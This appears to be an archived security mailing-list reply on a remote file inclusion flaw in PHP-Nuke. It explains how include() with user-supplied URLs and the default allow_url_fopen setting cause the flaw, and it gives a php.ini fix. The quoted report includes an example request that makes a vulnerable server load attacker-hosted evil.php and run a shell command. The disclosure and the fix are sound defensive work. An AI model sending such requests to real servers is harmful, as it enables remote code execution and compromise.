>Hi All!
>
> I've found a serious security flaw in PHP-Nuke.
> It allows user to execute any PHP code.
> .....
> Then just requesting
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al

> .......

Hello,

    I used to find this flaw in a lot of _home made_ scripts. This is
due to the use of the include() function with user passed parameters,
and it is not particular to phpnuke. It exists in a lot of scripts cause

the php default config allows to pass http:// and ftp:// parameters to
functions like include().

As it is said in the php manual:

"As long as support for the "URL fopen wrapper" is enabled when you
configure PHP (which it is unless you explicitly
 pass the --disable-url-fopen-wrapper flag to configure (for versions up

to 4.0.3) or set allow_url_fopen to off in
 php.ini (for newer versions)), you can use HTTP and FTP URLs with most
functions that take a filename as a
 parameter, including the require() and include() statements."

Quick Fix:
    Just set allow_url_fopen to off in php.ini .

    - www.projet7.org - Security Researchs

 
______________________________________________________________________________
ifrance.com, l'email gratuit le plus complet de l'Internet !
vos emails depuis un navigateur, en POP3, sur Minitel, sur le WAP...
http://www.ifrance.com/_reloc/email.emailif

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]